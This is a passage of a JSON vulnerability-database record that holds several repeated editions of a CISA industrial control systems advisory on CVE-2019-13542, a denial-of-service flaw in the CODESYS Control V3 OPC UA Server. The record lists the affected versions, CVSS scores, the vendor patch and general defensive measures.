([AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Critical Manufacturing\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Germany\n\n### 3.4 RESEARCHER\n\n3S-Smart Software Solutions GmbH reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\n3S-Smart Software Solutions GmbH has released Version 3.5.15.0 to resolve this vulnerability for all affected CODESYS products.\n\nPlease visit the CODESYS update page for more information on how to obtain the software update: [https://www.codesys.com/download/ ](<https://www.codesys.com/download/>)\n\nAs part of a security strategy, 3S-Smart Software Solutions GmbH recommends the following general defense measures to reduce the risk of exploits: \n\n * Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from outside.\n * Use firewalls to protect and separate the control system network from other networks.\n * Use VPN (virtual private networks) tunnels if remote access is required.\n * Activate and apply user management and password features.\n * Limit the access to both development and control system by physical means, operating system features, etc.\n * Protect both development and control system by using up to date virus detecting solutions. For more information and general recommendations for protecting machines and plants, see also the CODESYS security whitepaper at <https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf>\n\nFor more information, 3S-Smart Software Solutions GmbH has released a security report that can be viewed at the following link: \n<https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "published": "2019-09-12T00:00:00", "modified": "2019-09-12T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/icsa-19-255-04", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.dhs.gov/plain-writing-dhs", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.codesys.com/download/", "https://www.oig.dhs.gov/", "/forms/feedback?helpful=somewhat&document=ICSA-19-255-04: 3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04&site_name=US-CERT", "https://www.dhs.gov/freedom-information-act-foia", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "http://twitter.com/icscert", "https://cwe.mitre.org/data/definitions/476.html", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.dhs.gov/", "/forms/feedback?helpful=yes&document=ICSA-19-255-04: 3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04&site_name=US-CERT", "https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf", "https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf", "/forms/feedback?helpful=no&document=ICSA-19-255-04: 3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04&site_name=US-CERT", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"], "cvelist": ["CVE-2019-13542"], "immutableFields": [], "lastseen": "2020-10-28T01:18:13", "history": [], "viewCount": 58, "enchantments": {"dependencies": {"modified": "2020-10-28T01:18:13", "references": [{"idList": ["CVE-2019-13542"], "type": "cve"}, {"idList": ["ICSA-15-293-03", "ICSA-12-263-01", "ICSA-16-350-02", "ICSA-16-103-03", "ICSA-11-110-01", "ICSA-14-343-01", "ICSMA-20-296-01", "ICSA-20-056-02", "ICSA-20-044-01", "ICSA-12-137-02", "ICSA-20-098-03", "ICSMA-20-212-01", "ICSA-15-027-01", "ICSA-16-103-01", "ICSA-17-234-05", "ICSA-16-348-04", "ICSMA-18-240-01", "ICSA-12-145-01", "ICSA-12-025-02A", "ICSA-20-112-01", "ICSA-20-252-08", "ICSA-20-163-01", "ICSA-19-227-02", "ICSA-19-255-04", "ICSA-20-182-01", "ICSMA-20-196-01", "ICSA-11-298-01A", "ICSA-11-243-01", "ICSA-20-224-06", "ICSA-19-162-03", "ICSA-20-273-02", "ICSA-19-281-01", "ICSA-14-350-01", "ICSA-17-234-04", "ICSMA-17-017-01", "ICSA-18-282-01", "ICSA-19-304-03", "ICSA-19-351-01", "ICSA-13-213-02", "ICSA-11-126-01", "ICSA-17-201-01", "ICSMA-18-226-01", "ICSMA-19-241-02", "ICSA-18-242-01", "ICSA-19-246-02", "ICSA-15-111-02", "ICSA-19-260-03", "ICSMA-19-311-02", "ICSA-20-273-01", "ICSA-18-352-04", "ICSA-18-226-01", "ICSA-18-310-01", "ICSA-15-195-01", "ICSA-19-302-01", "ICSA-16-278-02", "ICSA-16-341-01", "ICSA-15-181-01", "ICSA-17-103-01", "ICSA-10-337-01", "ICSA-15-090-02", "ICSA-18-277-01", "ICSA-19-003-03", "ICSA-15-274-01", "ICSA-19-239-02", "ICSA-17-164-02", "ICSA-16-315-01", "ICSMA-19-192-01", "ICSA-16-147-02", "ICSA-17-129-03", "ICSA-13-297-01", "ICSA2012601", "ICSA-17-131-02", "ICSA2012602", "ICSMA-19-241-01", "ICSA-16-194-02", "ICSA-19-029-01", "ICSA-16-070-02", "ICSA-17-187-05", "ICSA-17-227-01", "ICSA-15-055-01", "ICSA-20-142-01", "ICSA-15-097-01", "ICSA-10-316-01A", "ICSA-20-170-04", "ICSA-15-244-01", "ICSA-313-01", "ICSA-16-343-02", "ICSA-20-070-04", "ICSA-19-094-04", "ICSA-18-107-01", "ICSA-16-026-02", "ICSA-19-024-02", "ICSA-15-274-02A", "ICSA-20-086-01", "ICSA-17-094-04", "ICSA-18-352-01", "ICSA-16-299-01", "ICSA-12-016-01", "ICSA-19-281-03", "ICSA-14-269-02"], "type": "ics"}], "rev": 2}, "score": {"modified": "2020-10-28T01:18:13", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2020-10-28T01:18:13", "differentElements": ["description", "references"], "edition": 3}, {"bulletin": {"id": "ICSA-19-255-04", "hash": "f01c36b8da78414dfe249b7a7f2f7c84c86a36bb824ccbdd4c83e9ae8635a2c4", "type": "ics", "bulletinFamily": "info", "title": "3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 6.5**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** 3S-Smart Software Solutions GmbH\n * **Equipment: **CODESYS Control V3 OPC UA Server\n * **Vulnerability: **NULL Pointer Reference\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a denial-of-service condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following CODESYS Control V3 runtime systems, all Versions 3.5.11.0 to 3.5.15.0, containing the CODESYS OPC UA Server supporting OPC UA Security, are affected:\n\n * CODESYS Control for BeagleBone\n * CODESYS Control for emPC-A/iMX6\n * CODESYS Control for IOT2000\n * CODESYS Control for Linux\n * CODESYS Control for PFC100\n * CODESYS Control for PFC200\n * CODESYS Control for Raspberry Pi\n * CODESYS Control RTE V3\n * CODESYS Control RTE V3 (for Beckhoff CX)\n * CODESYS Control Win V3 (also part of the CODESYS Development System setup)\n * CODESYS Control V3 Runtime System Toolkit\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [NULL POINTER DEREFERENCE CWE-476](<https://cwe.mitre.org/data/definitions/476.html>)\n\nSending specific crafted requests from a trusted OPC UA client may cause a NULL pointer dereference, which may trigger a denial-of-service condition.\n\n[CVE-2019-13542](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Critical Manufacturing\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Germany\n\n### 3.4 RESEARCHER\n\n3S-Smart Software Solutions GmbH reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\n3S-Smart Software Solutions GmbH has released Version 3.5.15.0 to resolve this vulnerability for all affected CODESYS products.\n\nPlease visit the CODESYS update page for more information on how to obtain the software update: [https://www.codesys.com/download/ ](<https://www.codesys.com/download/>)\n\nAs part of a security strategy, 3S-Smart Software Solutions GmbH recommends the following general defense measures to reduce the risk of exploits: \n\n * Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from outside.\n * Use firewalls to protect and separate the control system network from other networks.\n * Use VPN (virtual private networks) tunnels if remote access is required.\n * Activate and apply user management and password features.\n * Limit the access to both development and control system by physical means, operating system features, etc.\n * Protect both development and control system by using up to date virus detecting solutions. For more information and general recommendations for protecting machines and plants, see also the CODESYS security whitepaper at <https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf>\n\nFor more information, 3S-Smart Software Solutions GmbH has released a security report that can be viewed at the following link: \n<https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04>); we'd welcome your feedback.\n", "published": "2019-09-12T00:00:00", "modified": "2019-09-12T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/icsa-19-255-04", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.dhs.gov/plain-writing-dhs", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.codesys.com/download/", "https://www.oig.dhs.gov/", "https://www.dhs.gov/freedom-information-act-foia", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "http://twitter.com/icscert", "https://cwe.mitre.org/data/definitions/476.html", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.usa.gov/", "https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04", "https://www.dhs.gov/", "https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf", "https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"], "cvelist": ["CVE-2019-13542"], "immutableFields": [], "lastseen": "2020-12-18T03:22:32", "history": [], "viewCount": 59, "enchantments": {"dependencies": {"modified": "2020-12-18T03:22:32", "references": [{"idList": ["CVE-2019-13542"], "type": "cve"}, {"idList": ["ICSA-19-295-01", "ICSMA-19-190-01", "ICSMA-17-250-02A", "ICSA-15-239-02", "ICSA-18-261-01", "ICSA-14-121-01", "ICSA-18-282-02", "ICSA-18-354-02", "ICSA-18-163-01", "ICSA-15-069-01", "ICSMA-20-170-03", "ICSA-15-071-01", "ICSA-19-290-02", "ICSA-19-190-02", "ICSA-20-161-03", "ICSA-15-323-01", "ICSA-18-317-03", "ICSA-15-062-01", "ICSA-19-227-02", "ICSA-19-309-01", "ICSA-20-105-07", "ICSA-15-069-02", "ICSMA-18-142-01", "ICSA-17-341-01", "ICSA-18-046-04", "ICSMA-19-353-01", "ICSA-20-063-03", "ICSA-17-243-04", "ICSA-20-315-03", "ICSA-17-234-04", "ICSA-17-047-02", "ICSA-12-030-01A", "ICSA-18-032-03", "ICSA-18-254-04", "ICSA-13-213-02", "ICSA-20-044-02", "ICSA-11-168-01A", "ICSMA-17-318-01", "ICSMA-19-120-01", "ICS-VU-313-03", "ICSA-17-192-02", "ICSA-11-294-01", "ICSA-19-213-01", "ICSA-16-131-01", "ICSA-16-040-01", "ICSA-18-095-03", "ICSA-19-162-02", "ICSA-12-228-01A", "ICSA-17-180-01A", "ICSA-18-338-01", "ICSA-16-161-01", "ICSA-16-278-02", "ICSA-13-079-01", "ICSA-18-212-01", "ICSA-18-058-03", "ICSA-15-125-01B", "ICSA-15-090-02", "ICSA-19-304-04", "ICSA-14-198-03G", "ICSA-13-079-02", "ICSA-17-264-04", "ICSA-16-336-05B", "ICSA-11-285-01", "ICSA-19-022-01", "ICSA-13-077-01B", "ICSA-18-240-01", "ICSA2012601", "ICSA-16-166-01", "ICSA-19-178-05", "ICSA2012602", "ICSMA-19-241-01", "ICSA-13-225-02", "ICSA-19-106-03", "ICSA-20-324-03", "ICSA-13-113-01", "ICSA-15-013-03", "ICSA-20-042-10", "ICSA-20-324-02", "ICSA-10-316-01A", "ICSA-21-049-02", "ICSA-17-304-02", "ICSA-17-010-01A", "ICSA-19-134-05", "ICSA-15-237-01", "ICSA-313-01", "ICSA-21-040-06", "ICSA-17-194-03", "ICSA-20-161-02", "ICSA-11-161-01", "ICSA-11-017-01", "ICSA-19-344-05", "ICSA-13-225-01", "ICSA-20-210-02", "ICSA-17-059-01", "ICSA-15-064-04", "ICSA-12-297-02", "ICSA-20-086-01", "ICSA-15-232-01", "ICSA-17-320-01", "ICSA-19-050-01"], "type": "ics"}], "rev": 2}, "score": {"modified": "2020-12-18T03:22:32", "rev": 2, "value": 5.8, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2020-12-18T03:22:32", "differentElements": ["description", "references"], "edition": 4}, {"bulletin": {"id": "ICSA-19-255-04", "hash": "90a49dccf915447c8dd01fd2683081c8", "type": "ics", "bulletinFamily": "info", "title": "3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 6.5**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** 3S-Smart Software Solutions GmbH\n * **Equipment: **CODESYS Control V3 OPC UA Server\n * **Vulnerability: **NULL Pointer Reference\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a denial-of-service condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following CODESYS Control V3 runtime systems, all Versions 3.5.11.0 to 3.5.15.0, containing the CODESYS OPC UA Server supporting OPC UA Security, are affected:\n\n * CODESYS Control for BeagleBone\n * CODESYS Control for emPC-A/iMX6\n * CODESYS Control for IOT2000\n * CODESYS Control for Linux\n * CODESYS Control for PFC100\n * CODESYS Control for PFC200\n * CODESYS Control for Raspberry Pi\n * CODESYS Control RTE V3\n * CODESYS Control RTE V3 (for Beckhoff CX)\n * CODESYS Control Win V3 (also part of the CODESYS Development System setup)\n * CODESYS Control V3 Runtime System Toolkit\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [NULL POINTER DEREFERENCE CWE-476](<https://cwe.mitre.org/data/definitions/476.html>)\n\nSending specific crafted requests from a trusted OPC UA client may cause a NULL pointer dereference, which may trigger a denial-of-service condition.\n\n[CVE-2019-13542](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Critical Manufacturing\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Germany\n\n### 3.4 RESEARCHER\n\n3S-Smart Software Solutions GmbH reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\n3S-Smart Software Solutions GmbH has released Version 3.5.15.0 to resolve this vulnerability for all affected CODESYS products.\n\nPlease visit the CODESYS update page for more information on how to obtain the software update: [https://www.codesys.com/download/ ](<https://www.codesys.com/download/>)\n\nAs part of a security strategy, 3S-Smart Software Solutions GmbH recommends the following general defense measures to reduce the risk of exploits: \n\n * Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from outside.\n * Use firewalls to protect and separate the control system network from other networks.\n * Use VPN (virtual private networks) tunnels if remote access is required.\n * Activate and apply user management and password features.\n * Limit the access to both development and control system by physical means, operating system features, etc.\n * Protect both development and control system by using up to date virus detecting solutions. For more information and general recommendations for protecting machines and plants, see also the CODESYS security whitepaper at <https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf>\n\nFor more information, 3S-Smart Software Solutions GmbH has released a security report that can be viewed at the following link: \n<https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04>); we'd welcome your feedback.\n", "published": "2019-09-12T00:00:00", "modified": "2019-09-12T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/icsa-19-255-04", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04", "https://www.dhs.gov/privacy-policy", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.dhs.gov/plain-writing-dhs", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.codesys.com/download/", "https://www.oig.dhs.gov/", "https://www.dhs.gov/freedom-information-act-foia", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "http://twitter.com/icscert", "https://cwe.mitre.org/data/definitions/476.html", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.dhs.gov/", "https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf", "https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"], "cvelist": ["CVE-2019-13542"], "immutableFields": [], "lastseen": "2021-02-24T09:27:23", "history": [], "viewCount": 59, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-13542"]}, {"type": "ics", "idList": ["ICSA-18-347-02", "ICSA-19-304-01", "ICSA-20-063-02", "ICSA-17-124-02", "ICSA-10-097-01", "ICSA-18-114-01", "ICSA-17-178-01", "ICSA-20-287-03", "ICSA-17-129-01", "ICSA-18-233-01", "ICSA-17-334-02", "ICSA-19-064-01", "ICSA-17-096-01A", "ICSA-11-056-01A", "ICSA-15-162-01A", "ICSA-19-344-05", "ICSA-13-225-02", "ICSA-20-014-02", "ICSA-19-094-01", "ICSA-14-133-02", "ICSA-12-283-02", "ICSA-20-266-02", "ICSA-15-286-01", "ICSA-18-107-02", "ICSA-16-161-01", "ICSA-11-361-01", "ICSA-12-158-01", "ICSA-14-128-01", "ICSA-16-306-03", "ICSA-15-211-01", "ICSA-16-259-03", "ICSA-19-085-02", "ICSA-14-133-01", "ICSA-11-069-01B", "ICSA-12-249-02", "ICSA-19-134-03", "ICSA-19-178-05", "ICSA-20-072-01", "ICSA-19-155-03", "ICSA-20-014-04", "ICSA-19-290-01", "ICSA-19-311-01", "ICSA-16-287-01", "ICSA-10-337-01", "ICSA-14-098-02", "ICSA-19-157-02", "ICSMA-19-113-01", "ICSA-13-079-03", "ICSA-18-081-02", "ICSA-18-025-01", "ICSA-17-115-03", "ICSA2012602", "ICSA-11-294-01", "ICSA-20-079-01", "ICSA-19-304-03", "ICSA-19-010-02", "ICSA-17-152-02", "ICSA-12-122-01", "ICSA-15-335-02", "ICSA-15-055-02", "ICSA-17-278-02", "ICSMA-18-128-01", "ICSA-19-162-04", "ICSA-19-192-02", "ICSMA-19-080-01", "ICSA2012601", "ICSA-14-259-01A", "ICSA-16-299-01", "ICSA-11-231-01", "ICSA-19-136-01", "ICSA-12-243-01", "ICSMA-20-177-01", "ICSA-19-157-01", "ICSA-15-246-01", "ICSA-16-334-03", "ICSA-17-094-03", "ICSA-11-314-01", "ICSMA-21-019-01", "ICSA-19-239-01", "ICSA-21-019-02", "ICSA-17-026-02A", "ICSA-11-279-02", "ICSA-19-190-01", "ICSA-18-198-03", "ICSA-15-258-02", "ICSA-19-304-02", "ICSA-18-240-01", "ICSA-20-070-06", "ICSA-313-01", "ICSA-16-154-01", "ICSA-18-240-04", "ICSA-18-249-01", "ICSA-12-185-01", "ICSA-17-222-04", "ICSA-11-167-01", "ICSA-18-046-01", "ICSA-18-298-01", "ICSA-19-134-06", "ICSA-13-226-01", "ICSA-18-172-02"]}], "modified": "2021-02-24T09:27:23", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-02-24T09:27:23", "rev": 2}}, "objectVersion": "1.4"}, "lastseen": "2021-02-24T09:27:23", "differentElements": ["href"], "edition": 5}, {"bulletin": {"id": "ICSA-19-255-04", "hash": "1fc2922304b77db2abd73d70adf0330a", "type": "ics", "bulletinFamily": "info", "title": "3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 6.5**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** 3S-Smart Software Solutions GmbH\n * **Equipment: **CODESYS Control V3 OPC UA Server\n * **Vulnerability: **NULL Pointer Reference\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a denial-of-service condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following CODESYS Control V3 runtime systems, all Versions 3.5.11.0 to 3.5.15.0, containing the CODESYS OPC UA Server supporting OPC UA Security, are affected:\n\n * CODESYS Control for BeagleBone\n * CODESYS Control for emPC-A/iMX6\n * CODESYS Control for IOT2000\n * CODESYS Control for Linux\n * CODESYS Control for PFC100\n * CODESYS Control for PFC200\n * CODESYS Control for Raspberry Pi\n * CODESYS Control RTE V3\n * CODESYS Control RTE V3 (for Beckhoff CX)\n * CODESYS Control Win V3 (also part of the CODESYS Development System setup)\n * CODESYS Control V3 Runtime System Toolkit\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [NULL POINTER DEREFERENCE CWE-476](<https://cwe.mitre.org/data/definitions/476.html>)\n\nSending specific crafted requests from a trusted OPC UA client may cause a NULL pointer dereference, which may trigger a denial-of-service 